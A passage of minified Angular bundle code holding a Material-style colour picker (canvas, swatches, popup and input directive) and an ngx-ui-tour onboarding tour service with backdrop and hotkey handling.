new(e||t)(Ee(qi))},t.\u0275cmp=Wt({type:t,selectors:[["ngx-mat-color-canvas"]],hostAttrs:[1,"ngx-mat-color-canvas"],features:[ci,sa],decls:30,vars:3,consts:[[3,"formGroup"],[1,"color-canvas-row"],[1,"zone-canvas"],["id","color-block","width","200","height","200",1,"zone-block",3,"mousedown","mouseup"],[3,"colorChanged"],[1,"zone-inputs"],["matInput","","formControlName","r","ngxMatNumericColorInput","","autocomplete","off"],["matInput","","formControlName","g","ngxMatNumericColorInput","","autocomplete","off"],["matInput","","formControlName","b","ngxMatNumericColorInput","","autocomplete","off"],["mat-mini-fab","",1,"preview"],["matPrefix","",1,"symbol"],["matInput","","formControlName","hex","autocomplete","off"],["matInput","","formControlName","a","type","number","min","0","max","1","step","0.1","autocomplete","off"]],template:function(e,i){1&e&&(m(0,"form",0)(1,"div",1)(2,"div",2)(3,"canvas",3),he("mousedown",function(r){return i.onMousedown(r)})("mouseup",function(r){return i.onMouseup(r)}),u(),m(4,"ngx-mat-color-slider",4),he("colorChanged",function(r){return i.onSliderColorChanged(r)}),u()(),m(5,"div",5)(6,"mat-form-field")(7,"mat-label"),s(8,"R"),u(),it(9,"input",6),u(),m(10,"mat-form-field")(11,"mat-label"),s(12,"G"),u(),it(13,"input",7),u(),m(14,"mat-form-field")(15,"mat-label"),s(16,"B"),u(),it(17,"input",8),u()()(),m(18,"div",1),it(19,"button",9),m(20,"mat-form-field")(21,"mat-label"),s(22,"HEX6"),u(),m(23,"mat-label",10),s(24,"#\xa0"),u(),it(25,"input",11),u(),m(26,"mat-form-field")(27,"mat-label"),s(28,"A"),u(),it(29,"input",12),u()()()),2&e&&(V("formGroup",i.formGroup),C(19),ri("background-color",(null==i.color?null:i.color.rgba)||"transparent"))},dependencies:[nn,un,mF,Xa,da,EN,an,Ac,Ta,lN,Dd,mx,lg,lx,J6e,Z6e],styles:[".ngx-mat-color-canvas .color-canvas-row{display:flex}.ngx-mat-color-canvas .color-canvas-row:first-of-type{height:200px;margin-bottom:12px}.ngx-mat-color-canvas .color-canvas-row:first-of-type .card{height:180px}.ngx-mat-color-canvas .color-canvas-row canvas:hover{cursor:crosshair}.ngx-mat-color-canvas .color-canvas-row .zone{display:flex}.ngx-mat-color-canvas .color-canvas-row .zone-canvas{height:200px}.ngx-mat-color-canvas .color-canvas-row .zone-canvas .zone-block{border:1px solid rgba(0,0,0,.12)}.ngx-mat-color-canvas .color-canvas-row .zone-strip{flex-basis:auto;margin-left:10px}.ngx-mat-color-canvas .color-canvas-row .zone-inputs{display:flex;width:40px;height:200px;flex-direction:column;margin-left:16px;margin-top:12px}.ngx-mat-color-canvas .color-canvas-row:nth-of-type(2){display:flex}.ngx-mat-color-canvas .color-canvas-row:nth-of-type(2) .preview{min-width:40px;min-height:40px;height:40px;width:40px}.ngx-mat-color-canvas .color-canvas-row:nth-of-type(2) .mat-form-field{margin-left:16px}.ngx-mat-color-canvas .color-canvas-row:nth-of-type(2) .mat-form-field:first-of-type{width:170px}.ngx-mat-color-canvas .color-canvas-row:nth-of-type(2) .mat-form-field:first-of-type .symbol{font-weight:bold;color:#0000008a}.ngx-mat-color-canvas .color-canvas-row:nth-of-type(2) .mat-form-field:last-of-type{width:40px}.ngx-mat-color-canvas .mat-form-field-label{font-weight:bold}\n"],encapsulation:2}),t})(),ixe=(()=>{class t{constructor(){this.colorChanged=new Tt,this.colors1=Sq.slice(0,8),this.colors2=Sq.slice(8,16)}set color(e){e&&(this.selectedColor=e.toHexString())}ngOnInit(){}select(e){this.selectedColor=e;const{r:i,g:n,b:r,a:c}=e5(e);this.colorChanged.emit(new kp(i,n,r,c))}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ngx-mat-color-collection"]],hostAttrs:[1,"ngx-mat-color-collection"],inputs:{color:"color"},outputs:{colorChanged:"colorChanged"},decls:4,vars:2,consts:[[1,"color-collection-row"],["mat-mini-fab","","class","btn-color",3,"background-color","ngClass","click",4,"ngFor","ngForOf"],["mat-mini-fab","",1,"btn-color",3,"ngClass","click"]],template:function(e,i){1&e&&(m(0,"div",0),ne(1,U6e,1,5,"button",1),u(),m(2,"div",0),ne(3,q6e,1,5,"button",1),u()),2&e&&(C(1),V("ngForOf",i.colors1),C(2),V("ngForOf",i.colors2))},dependencies:[ig,Zi,da],styles:[".ngx-mat-color-collection .btn-color{height:20px;width:20px;margin-right:11px;box-shadow:none;opacity:.3}.ngx-mat-color-collection .btn-color.active{box-shadow:0 3px 5px -1px #0003,0 6px 10px #00000024,0 1px 18px #0000001f;opacity:1}\n"],encapsulation:2}),t})(),Lq=(()=>{class t{constructor(){this.colorChanged=new Tt}ngOnInit(){}handleColorChanged(e){this.colorChanged.emit(e)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ngx-mat-color-palette"]],hostAttrs:[1,"ngx-mat-color-palette"],inputs:{color:"color"},outputs:{colorChanged:"colorChanged"},decls:2,vars:2,consts:[[3,"color","colorChanged"]],template:function(e,i){1&e&&(m(0,"ngx-mat-color-canvas",0),he("colorChanged",function(r){return i.handleColorChanged(r)}),u(),m(1,"ngx-mat-color-collection",0),he("colorChanged",function(r){return i.handleColorChanged(r)}),u()),2&e&&(V("color",i.color),C(1),V("color",i.color))},dependencies:[txe,ixe],styles:[".ngx-mat-color-palette .actions{margin-top:10px;display:flex}.ngx-mat-color-palette .actions .left{display:flex;flex-direction:column;margin-right:15px}.ngx-mat-color-palette .actions .left .preview{flex:2 1 auto;margin-bottom:10px}.ngx-mat-color-palette .actions .right{display:flex;width:40px;flex-direction:column}\n"],encapsulation:2}),t})(),t5=(()=>{class t{constructor(){}sameColor(e,i){return null==e&&null==i||null!=e&&null!=i&&e.rgba===i.rgba}format(e,i){return e.toString(i)}parse(e){const i=e5(e);return i?new kp(i.r,i.g,i.b,i.a):null}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const axe={display:{colorInput:"hex"}},zq=new ni("mat-color-formats"),Wq=new ni("ngx-mat-colorpicker-scroll-strategy"),oxe={provide:Wq,deps:[As],useFactory:function nxe(t){return()=>t.scrollStrategies.reposition()}},rxe=Pd(class{constructor(t){this._elementRef=t}});let Fq=(()=>{class t extends rxe{constructor(e){super(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["ngx-mat-color-picker-content"]],viewQuery:function(e,i){if(1&e&&Mi(Lq,5),2&e){let n;Vt(n=Bt())&&(i._palette=n.first)}},hostAttrs:[1,"ngx-mat-colorpicker-content"],hostVars:3,hostBindings:function(e,i){2&e&&(s1("@transformPanel","enter"),Ct("ngx-mat-colorpicker-content-touch",i.picker.touchUi))},inputs:{color:"color"},exportAs:["ngxMatColorPickerContent"],features:[ci],decls:1,vars:1,consts:[[3,"color","colorChanged"]],template:function(e,i){1&e&&(m(0,"ngx-mat-color-palette",0),he("colorChanged",function(r){return i.picker.select(r)}),u()),2&e&&V("color",i.picker._selected)},dependencies:[Lq],styles:[".ngx-mat-colorpicker-content{display:block;border-radius:4px;box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f;background-color:#fff;color:#000000de;padding:16px}.ngx-mat-colorpicker-content .ngx-mat-color-palette{width:296px;height:354px}.ngx-mat-colorpicker-content-touch{display:block;max-height:80vh;overflow:auto}.ngx-mat-colorpicker-content-touch .ngx-mat-color-palette{min-width:250px;min-height:312px;max-width:750px;max-height:788px}@media all and (orientation: landscape){.mat-colorpicker-content-touch .ngx-mat-color-palette{width:64vh;height:80vh}}@media all and (orientation: portrait){.mat-colorpicker-content-touch .ngx-mat-color-palette{width:80vw;height:100vw}}\n"],encapsulation:2,data:{animation:[NV.transformPanel,NV.fadeInCalendar]},changeDetection:0}),t})(),sxe=(()=>{class t{constructor(e,i,n,r,c,d,T,k){this._dialog=e,this._overlay=i,this._zone=n,this._adapter=r,this._dir=c,this._document=T,this._viewContainerRef=k,this.openedStream=new Tt,this.closedStream=new Tt,this._touchUi=!1,this._opened=!1,this._defaultColor="primary",this._validSelected=null,this._disabledChange=new J,this._focusedElementBeforeOpen=null,this._inputSubscription=I.EMPTY,this._selectedChanged=new J,this._scrollStrategy=d}get disabled(){return void 0===this._disabled&&this._pickerInput?this._pickerInput.disabled:!!this._disabled}set disabled(e){const i=wi(e);i!==this._disabled&&(this._disabled=i,this._disabledChange.next(i))}get touchUi(){return this._touchUi}set touchUi(e){this._touchUi=wi(e)}get opened(){return this._opened}set opened(e){e?this.open():this.close()}get defaultColor(){return this._defaultColor}set defaultColor(e){this._defaultColor=e}get color(){return this._color||(this._pickerInput?this._pickerInput.getThemePalette():void 0)}set color(e){this._color=e}get _selected(){return this._validSelected}set _selected(e){this._validSelected=e}ngOnInit(){}ngOnDestroy(){this.close(),this._inputSubscription.unsubscribe(),this._disabledChange.complete(),this._popupRef&&(this._popupRef.dispose(),this._popupComponentRef=null)}select(e){let i=this._selected;this._selected=e,this._adapter.sameColor(i,this._selected)||this._selectedChanged.next(e)}registerInput(e){if(this._pickerInput)throw Error("A ColorPicker can only be associated with a single input.");this._pickerInput=e,this._inputSubscription=this._pickerInput._valueChange.subscribe(i=>this._selected=i)}open(){if(!this._opened&&!this.disabled){if(!this._pickerInput)throw Error("Attempted to open an ColorPicker with no associated input.");this._document&&(this._focusedElementBeforeOpen=this._document.activeElement),this.touchUi?this._openAsDialog():this._openAsPopup(),this._opened=!0,this.openedStream.emit()}}_openAsDialog(){this._dialogRef&&this._dialogRef.close(),this._dialogRef=this._dialog.open(Fq,{direction:this._dir?this._dir.value:"ltr",viewContainerRef:this._viewContainerRef,panelClass:"ngx-mat-colorpicker-dialog"}),this._dialogRef.afterClosed().subscribe(()=>this.close()),this._dialogRef.componentInstance.picker=this,this._setColor()}_openAsPopup(){this._portal||(this._portal=new hp(Fq,this._viewContainerRef)),this._popupRef||this._createPopup(),this._popupRef.hasAttached()||(this._popupComponentRef=this._popupRef.attach(this._portal),this._popupComponentRef.instance.picker=this,this._setColor(),this._zone.onStable.asObservable().pipe(Cn(1)).subscribe(()=>{this._popupRef.updatePosition()}))}_createPopup(){const e=new yg({positionStrategy:this._createPopupPositionStrategy(),hasBackdrop:!0,backdropClass:"mat-overlay-transparent-backdrop",direction:this._dir,scrollStrategy:this._scrollStrategy(),panelClass:"mat-colorpicker-popup"});this._popupRef=this._overlay.create(e),this._popupRef.overlayElement.setAttribute("role","dialog"),ra(this._popupRef.backdropClick(),this._popupRef.detachments(),this._popupRef.keydownEvents().pipe(Dn(i=>27===i.keyCode||this._pickerInput&&i.altKey&&38===i.keyCode))).subscribe(i=>{i&&i.preventDefault(),this.close()})}close(){if(!this._opened)return;this._popupRef&&this._popupRef.hasAttached()&&this._popupRef.detach(),this._dialogRef&&(this._dialogRef.close(),this._dialogRef=null),this._portal&&this._portal.isAttached&&this._portal.detach();const e=()=>{this._opened&&(this._opened=!1,this.closedStream.emit(),this._focusedElementBeforeOpen=null)};this._focusedElementBeforeOpen&&"function"==typeof this._focusedElementBeforeOpen.focus?(this._focusedElementBeforeOpen.focus(),setTimeout(e)):e()}_setColor(){const e=this.color;this._popupComponentRef&&(this._popupComponentRef.instance.color=e),this._dialogRef&&(this._dialogRef.componentInstance.color=e)}_createPopupPositionStrategy(){return this._overlay.position().flexibleConnectedTo(this._pickerInput.getConnectedOverlayOrigin()).withTransformOriginOn(".ngx-mat-colorpicker-content").withFlexibleDimensions(!1).withViewportMargin(8).withLockedPosition().withPositions([{originX:"start",originY:"bottom",overlayX:"start",overlayY:"top"},{originX:"start",originY:"top",overlayX:"start",overlayY:"bottom"},{originX:"end",originY:"bottom",overlayX:"end",overlayY:"top"},{originX:"end",originY:"top",overlayX:"end",overlayY:"bottom"}])}}return t.\u0275fac=function(e){return new(e||t)(Ee(vu),Ee(As),Ee(qi),Ee(t5),Ee(Cr,8),Ee(Wq),Ee(ga,8),Ee(fo))},t.\u0275cmp=Wt({type:t,selectors:[["ngx-mat-color-picker"]],inputs:{disabled:"disabled",touchUi:"touchUi",opened:"opened",defaultColor:"defaultColor",color:"color"},outputs:{openedStream:"opened",closedStream:"closed"},exportAs:["ngxMatColorPicker"],decls:0,vars:0,template:function(e,i){},encapsulation:2,changeDetection:0}),t})();class lT{constructor(a,e){this.target=a,this.targetElement=e,this.value=this.target.value}}const cxe={provide:Ls,useExisting:ja(()=>a5),multi:!0},lxe={provide:ys,useExisting:ja(()=>a5),multi:!0};let a5=(()=>{class t{constructor(e,i,n,r){if(this._elementRef=e,this._formField=i,this._colorFormats=n,this._adapter=r,this.colorChange=new Tt,this.colorInput=new Tt,this._disabledChange=new Tt,this._valueChange=new Tt,this._onTouched=()=>{},this._cvaOnChange=()=>{},this._validatorOnChange=()=>{},this._pickerSubscription=I.EMPTY,this._validator=Td.compose([]),this._lastValueValid=!1,!this._colorFormats)throw function Y6e(t){return Error(`NgxMatColorPicker: No provider found for ${t}. You must define MAT_COLOR_FORMATS in your module`)}("MAT_COLOR_FORMATS")}set ngxMatColorPicker(e){!e||(this._picker=e,this._picker.registerInput(this),this._pickerSubscription.unsubscribe(),this._pickerSubscription=this._picker._selectedChanged.subscribe(i=>{this.value=i,this._cvaOnChange(i),this._onTouched(),this.colorInput.emit(new lT(this,this._elementRef.nativeElement)),this.colorChange.emit(new lT(this,this._elementRef.nativeElement))}))}get disabled(){return!!this._disabled}set disabled(e){const i=wi(e),n=this._elementRef.nativeElement;this._disabled!==i&&(this._disabled=i,this._disabledChange.emit(i)),i&&n.blur&&n.blur()}get value(){return this._value}set value(e){const i=this.value;this._value=e,this._formatValue(e),this._adapter.sameColor(i,e)||this._valueChange.emit(e)}getThemePalette(){return this._formField?this._formField.color:void 0}registerOnValidatorChange(e){this._validatorOnChange=e}validate(e){return this._validator?this._validator(e):null}getPopupConnectionElementRef(){return this.getConnectedOverlayOrigin()}getConnectedOverlayOrigin(){return this._formField?this._formField.getConnectedOverlayOrigin():this._elementRef}ngOnInit(){}ngOnDestroy(){this._pickerSubscription.unsubscribe(),this._valueChange.complete(),this._disabledChange.complete()}writeValue(e){this.value=e}registerOnChange(e){this._cvaOnChange=e}registerOnTouched(e){this._onTouched=e}setDisabledState(e){this.disabled=e}_onChange(){this.colorChange.emit(new lT(this,this._elementRef.nativeElement))}_onKeydown(e){this._picker&&e.altKey&&40===e.keyCode&&!this._elementRef.nativeElement.readOnly&&(this._picker.open(),e.preventDefault())}_onBlur(){this.value&&this._formatValue(this.value),this._onTouched()}_formatValue(e){this._elementRef.nativeElement.value=e?this._adapter.format(e,this._colorFormats.display.colorInput):""}_onInput(e){const i=this._lastValueValid,n=this._adapter.parse(e);this._adapter.sameColor(n,this._value)?i!==this._lastValueValid&&this._validatorOnChange():(this._value=n,this._cvaOnChange(n),this._valueChange.emit(n),this.colorInput.emit(new lT(this,this._elementRef.nativeElement)))}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(nn,8),Ee(zq,8),Ee(t5))},t.\u0275dir=Ot({type:t,selectors:[["input","ngxMatColorPicker",""]],hostVars:3,hostBindings:function(e,i){1&e&&he("input",function(r){return i._onInput(r.target.value)})("change",function(){return i._onChange()})("blur",function(){return i._onBlur()})("keydown",function(r){return i._onKeydown(r)}),2&e&&(Gs("disabled",i.disabled),Rt("aria-haspopup",i._picker?"dialog":null)("aria-owns",(null==i._picker?null:i._picker.opened)&&i._picker.id||null))},inputs:{ngxMatColorPicker:"ngxMatColorPicker",disabled:"disabled",value:"value"},outputs:{colorChange:"colorChange",colorInput:"colorInput"},exportAs:["ngxMatColorPickerInput"],features:[ki([cxe,lxe,{provide:c8,useExisting:t}])]}),t})(),Vq=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[t5,oxe],imports:[rn,l8,up,aA,_8,z4,ux,y8,yu,ib]}),t})();const mxe=["*"];var Pp=(()=>{return(t=Pp||(Pp={}))[t.Top=0]="Top",t[t.Bottom=1]="Bottom",t[t.All=2]="All",Pp;var t})();function Bq(t,a=Pp.All){const e=window.innerWidth,i=window.innerHeight,n=t.getBoundingClientRect(),r=n.left>=0&&n.right<=e,c=n.top>=0,d=n.bottom<=i;return a===Pp.Top?c&&r:a===Pp.Bottom?d&&r:c&&d&&r}class Hq{static ensureVisible(a){Bq(a,Pp.Bottom)?Bq(a,Pp.Top)||a.scrollIntoView(!0):a.scrollIntoView(!1)}}let n5=(()=>{class t{constructor(e){this.renderer=e.createRenderer(null,null)}show(e,i=!0){this.isScrollingEnabled=i,this.targetHtmlElement=e.nativeElement,this.backdropElements||(this.backdropElements=this.createBackdropElements(),this.subscribeToWindowResizeEvent()),this.setBackdropPosition()}setBackdropPosition(){const e=this.targetHtmlElement.getBoundingClientRect(),i=document.documentElement,n=i.scrollHeight,c=window.scrollX,d=window.scrollY,te=[{width:e.left+c,height:n,top:0,left:0},{width:e.width,height:e.top+d,top:0,left:e.left+c},{width:e.width,height:n-(e.bottom+d),top:e.bottom+d,left:e.left+c},{width:i.scrollWidth-(e.right+c),height:n,top:0,left:e.right+c}];for(let pe=0;pe<te.length;pe++){const Re=this.createBackdropStyles(te[pe]);this.applyStyles(Re,this.backdropElements[pe])}}subscribeToWindowResizeEvent(){const e=Tc(window,"resize");this.windowResizeSubscription$=e.pipe(function dxe(t){return Ie((a,e)=>{let i=!1,n=null,r=null;const c=()=>{if(null==r||r.unsubscribe(),r=null,i){i=!1;const d=n;n=null,e.next(d)}};a.subscribe(Ae(e,d=>{null==r||r.unsubscribe(),i=!0,n=d,r=Ae(e,c,y),pn(t(d)).subscribe(r)},()=>{c(),e.complete()},void 0,()=>{n=r=null}))})}(()=>$z(10))).subscribe(()=>{this.setBackdropPosition(),Hq.ensureVisible(this.targetHtmlElement)})}close(){this.backdropElements&&(this.removeBackdropElement(),this.windowResizeSubscription$.unsubscribe())}removeBackdropElement(){this.backdropElements.forEach(e=>this.renderer.removeChild(document.body,e)),this.backdropElements=void 0}applyStyles(e,i){for(const n of Object.keys(e))this.renderer.setStyle(i,n,e[n])}createBackdropStyles(e){return{position:this.isScrollingEnabled?"absolute":"fixed",width:`${e.width}px`,height:`${e.height}px`,top:`${e.top}px`,left:`${e.left}px`,backgroundColor:"rgba(0, 0, 0, 0.7)",zIndex:"101"}}createBackdropElement(){const e=this.renderer.createElement("div");return this.renderer.addClass(e,"ngx-ui-tour_backdrop"),this.renderer.appendChild(document.body,e),e}createBackdropElements(){return Array.from({length:4}).map(()=>this.createBackdropElement())}}return t.\u0275fac=function(e){return new(e||t)(At(qs))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();var Yl=(()=>{return(t=Yl||(Yl={}))[t.OFF=0]="OFF",t[t.ON=1]="ON",t[t.PAUSED=2]="PAUSED",Yl;var t})(),zg=(()=>{return(t=zg||(zg={}))[t.Forwards=0]="Forwards",t[t.Backwards=1]="Backwards",zg;var t})();const uxe={disableScrollToAnchor:!1,prevBtnTitle:"Prev",nextBtnTitle:"Next",endBtnTitle:"End",enableBackdrop:!1,isAsync:!1,isOptional:!1,delayAfterNavigation:0,nextOnAnchorClick:!1};let dT=(()=>{class t{constructor(e,i,n){this.router=e,this.rendererFactory=i,this.backdrop=n,this.stepShow$=new J,this.stepHide$=new J,this.initialize$=new J,this.start$=new J,this.end$=new J,this.pause$=new J,this.resume$=new J,this.anchorRegister$=new J,this.anchorUnregister$=new J,this.events$=ra(this.stepShow$.pipe(Xe(r=>({name:"stepShow",value:r}))),this.stepHide$.pipe(Xe(r=>({name:"stepHide",value:r}))),this.initialize$.pipe(Xe(r=>({name:"initialize",value:r}))),this.start$.pipe(Xe(r=>({name:"start",value:r}))),this.end$.pipe(Xe(r=>({name:"end",value:r}))),this.pause$.pipe(Xe(r=>({name:"pause",value:r}))),this.resume$.pipe(Xe(r=>({name:"resume",value:r}))),this.anchorRegister$.pipe(Xe(r=>({name:"anchorRegister",value:r}))),this.anchorUnregister$.pipe(Xe(r=>({name:"anchorUnregister",value:r})))),this.steps=[],this.anchors={},this.status=Yl.OFF,this.isHotKeysEnabled=!0,this.direction=zg.Forwards,this.renderer=i.createRenderer(null,null)}initialize(e,i){e&&e.length>0&&(this.status=Yl.OFF,this.steps=e.map(n=>Object.assign(Object.assign(Object.assign({},uxe),i),n)),this.initialize$.next(this.steps))}disableHotkeys(){this.isHotKeysEnabled=!1}enableHotkeys(){this.isHotKeysEnabled=!0}start(){this.startAt(0)}startAt(e){this.status=Yl.ON,this.goToStep(this.loadStep(e)),this.start$.next(),this.router.events.pipe(Dn(i=>i instanceof Ey),xd()).subscribe(()=>{this.currentStep&&this.currentStep.hasOwnProperty("route")&&this.hideStep(this.currentStep)})}end(){this.status=Yl.OFF,this.hideStep(this.currentStep),this.currentStep=void 0,this.removeLastAnchorClickListener(),this.backdrop.close(),this.end$.next()}pause(){this.status=Yl.PAUSED,this.hideStep(this.currentStep),this.pause$.next()}resume(){this.status=Yl.ON,this.showStep(this.currentStep),this.resume$.next()}toggle(e){e?this.currentStep?this.pause():this.resume():this.currentStep?this.end():this.start()}next(){this.direction=zg.Forwards,this.hasNext(this.currentStep)&&this.goToStep(this.loadStep(this.currentStep.nextStep||this.steps.indexOf(this.currentStep)+1))}hasNext(e){return e?void 0!==e.nextStep||this.steps.indexOf(e)<this.steps.length-1&&!this.isNextOptionalAnchorMissing(e):(console.warn("Can't get next step. No currentStep."),!1)}isNextOptionalAnchorMissing(e){for(let n=this.steps.indexOf(e)+1;n<this.steps.length;n++){const r=this.steps[n];if(!r.isOptional||this.anchors[r.anchorId])return!1}return!0}prev(){this.direction=zg.Backwards,this.hasPrev(this.currentStep)&&this.goToStep(this.loadStep(this.currentStep.prevStep||this.steps.indexOf(this.currentStep)-1))}hasPrev(e){return e?void 0!==e.prevStep||this.steps.indexOf(e)>0&&!this.isPrevOptionalAnchorMising(e):(console.warn("Can't get previous step. No currentStep."),!1)}isPrevOptionalAnchorMising(e){for(let n=this.steps.indexOf(e)-1;n>-1;n--){const r=this.steps[n];if(!r.isOptional||this.anchors[r.anchorId])return!1}return!0}goto(e){this.goToStep(this.loadStep(e))}register(e,i){if(e){if(this.anchors[e])throw new Error("anchorId "+e+" already registered!");this.anchors[e]=i,this.anchorRegister$.next(e)}}unregister(e){!e||(delete this.anchors[e],this.anchorUnregister$.next(e))}getStatus(){return this.status}isHotkeysEnabled(){return this.isHotKeysEnabled}goToStep(e){if(!e)return console.warn("Can't go to non-existent step"),void this.end();this.currentStep&&this.hideStep(this.currentStep),this.removeLastAnchorClickListener(),null!=e.route?this.navigateToRouteAndSetStep(e):this.setCurrentStepAsync(e)}removeLastAnchorClickListener(){this.unListenNextOnAnchorClickFn&&(this.unListenNextOnAnchorClickFn(),this.unListenNextOnAnchorClickFn=void 0)}listenToOnAnchorClick(e){e.nextOnAnchorClick&&(this.unListenNextOnAnchorClickFn=this.renderer.listen(this.anchors[e.anchorId].element.nativeElement,"click",()=>this.next()))}navigateToRouteAndSetStep(e){return ht(this,void 0,void 0,function*(){const i="string"==typeof e.route?e.route:this.router.createUrlTree(e.route);this.router.isActive(i,{paths:"exact",matrixParams:"exact",queryParams:"subset",fragment:"ignored"})?this.setCurrentStepAsync(e):(yield this.router.navigateByUrl(i))?this.setCurrentStepAsync(e,e.delayAfterNavigation):(console.warn("Navigation to route failed: ",e.route),this.end())})}loadStep(e){return"number"==typeof e?this.steps[e]:this.steps.find(i=>i.stepId===e)}setCurrentStep(e){this.currentStep=e,this.showStep(this.currentStep),this.router.events.pipe(Dn(i=>i instanceof Ey),xd()).subscribe(()=>{this.currentStep&&this.currentStep.hasOwnProperty("route")&&this.hideStep(this.currentStep)})}setCurrentStepAsync(e,i=0){setTimeout(()=>this.setCurrentStep(e),i)}showStep(e){const i=this.anchors[e&&e.anchorId];if(!i)return e.isAsync?void this.anchorRegister$.pipe(Dn(n=>n===e.anchorId),xd(),Z3(0)).subscribe(()=>this.showStep(e)):e.isOptional?void(this.direction===zg.Forwards?this.next():this.prev()):(console.warn("Can't attach to unregistered anchor with id "+e.anchorId),void this.end());this.listenToOnAnchorClick(e),this.scrollToAnchor(e),i.showTourStep(e),this.toggleBackdrop(e),this.stepShow$.next(e)}hideStep(e){const i=this.anchors[e&&e.anchorId];!i||(i.hideTourStep(),this.stepHide$.next(e))}scrollToAnchor(e){e.disableScrollToAnchor||Hq.ensureVisible(this.anchors[null==e?void 0:e.anchorId].element.nativeElement)}toggleBackdrop(e){var i,n;const r=this.anchors[null==e?void 0:e.anchorId],c=null===(n=null===(i=r.getIsScrollingEnabled)||void 0===i?void 0:i.call(r))||void 0===n||n;e.enableBackdrop?this.backdrop.show(r.element,c):this.backdrop.close()}}return t.\u0275fac=function(e){return new(e||t)(At(Oo),At(qs),At(n5))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),hxe=(()=>{class t{constructor(e){this.tourService=e}onEscapeKey(){this.tourService.getStatus()===Yl.ON&&this.tourService.isHotkeysEnabled()&&this.tourService.end()}onArrowRightKey(){const e=this.tourService.currentStep;this.tourService.getStatus()===Yl.ON&&this.tourService.hasNext(this.tourService.currentStep)&&this.tourService.isHotkeysEnabled()&&(null==e||!e.nextOnAnchorClick)&&this.tourService.next()}onArrowLeftKey(){this.tourService.getStatus()===Yl.ON&&this.tourService.hasPrev(this.tourService.currentStep)&&this.tourService.isHotkeysEnabled()&&this.tourService.prev()}}return t.\u0275fac=function(e){return new(e||t)(Ee(dT))},t.\u0275cmp=Wt({type:t,selectors:[["tour-hotkey-listener"]],hostBindings:function(e,i){1&e&&he("keydown.Escape",function(){return i.onEscapeKey()},0,zC)("keydown.ArrowRight",function(){return i.onArrowRightKey()},!1,zC)("keydown.ArrowLeft",function(){return i.onArrowLeftKey()},!1,zC)},ngContentSelectors:mxe,decls:1,vars:0,template:function(e,i){1&e&&(Jn(),va(0))},encapsulation:2}),t})(),Uq=(()=>{class t{static forRoot(){return{ngModule:t,providers:[dT,n5]}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,Ms]}),t})();function fxe(t,a){1&t&&Ir(0)}function pxe(t,a){if(1&t){const e=Ye();m(0,"button",11),he("click",function(){return be(e),Me(B(2).tourService.next())}),s(1),m(2,"mat-icon"),s(3,"chevron_right"),u()()}if(2&t){const e=B().step;C(1),ct(" ",null==e?null:e.nextBtnTitle," ")}}function _xe(t,a){if(1&t){const e=Ye();m(0,"button",12),he("click",function(){return be(e),Me(B(2).tourService.end())}),s(1),u()}if(2&t){const e=B().step;C(1),ct(" ",null==e?null:e.endBtnTitle," ")}}function gxe(t,a){if(1&t){const e=Ye();m(0,"mat-card",3),he("click",function(n){return n.stopPropagation()}),m(1,"mat-card-title")(2,"div",4),s(3),u(),m(4,"button",5),he("click",function(){return be(e),Me(B().tourService.end())}),m(5,"mat-icon"),s(6,"close"),u()()(),it(7,"mat-card-content",6),m(8,"mat-card-actions",7)(9,"button",8),he("click",function(){return be(e),Me(B().tourService.prev())}),m(10,"mat-icon"),s(11,"chevron_left"),u(),s(12),u(),ne(13,pxe,4,1,"button",9),ne(14,_xe,2,1,"button",10),u()()}if(2&t){const e=a.step,i=B();C(3),ke(null==e?null:e.title),C(4),V("innerHTML",null==e?null:e.content,Uc),C(2),V("disabled",!i.tourService.hasPrev(e)),C(3),ct(" ",null==e?null:e.prevBtnTitle," "),C(1),V("ngIf",i.tourService.hasNext(e)&&!e.nextOnAnchorClick),C(1),V("ngIf",!i.tourService.hasNext(e))}}const Cxe=function(t){return{step:t}};let Gb=(()=>{class t extends dT{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();function yxe(t,a){return()=>{const i=t.scrollStrategies;return a.currentStep.disablePageScrolling?i.block():i.reposition()}}let bxe=(()=>{class t{constructor(e){this.changeDetector=e}markForCheck(){this.changeDetector.markForCheck()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["tour-anchor-opener"]],viewQuery:function(e,i){if(1&e&&Mi(po,7),2&e){let n;Vt(n=Bt())&&(i.trigger=n.first)}},features:[ki([{provide:n8,useFactory:yxe,deps:[As,Gb]}])],decls:1,vars:1,consts:[["matMenuTriggerFor","",3,"matMenuTriggerRestoreFocus"]],template:function(e,i){1&e&&it(0,"span",0),2&e&&V("matMenuTriggerRestoreFocus",!1)},dependencies:[po],styles:["[_nghost-%COMP%]{display:none}"]}),t})(),o5=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),qq=(()=>{class t{constructor(e,i,n,r,c){this.injector=e,this.viewContainer=i,this.element=n,this.tourService=r,this.tourStepTemplate=c}ngOnInit(){this.tourService.register(this.tourAnchor,this)}ngOnDestroy(){this.tourService.unregister(this.tourAnchor)}createOpener(){this.opener=this.viewContainer.createComponent(bxe).instance}showTourStep(e){var i,n;this.isActive=!0,this.tourStepTemplate.templateComponent.step=e,this.opener||this.createOpener();const r=this.opener.trigger;r._element=this.element;const c=this.tourStepTemplate.templateComponent.tourStep;r.menu=c,c.xPosition=(null===(i=e.placement)||void 0===i?void 0:i.xPosition)||"after",c.yPosition=(null===(n=e.placement)||void 0===n?void 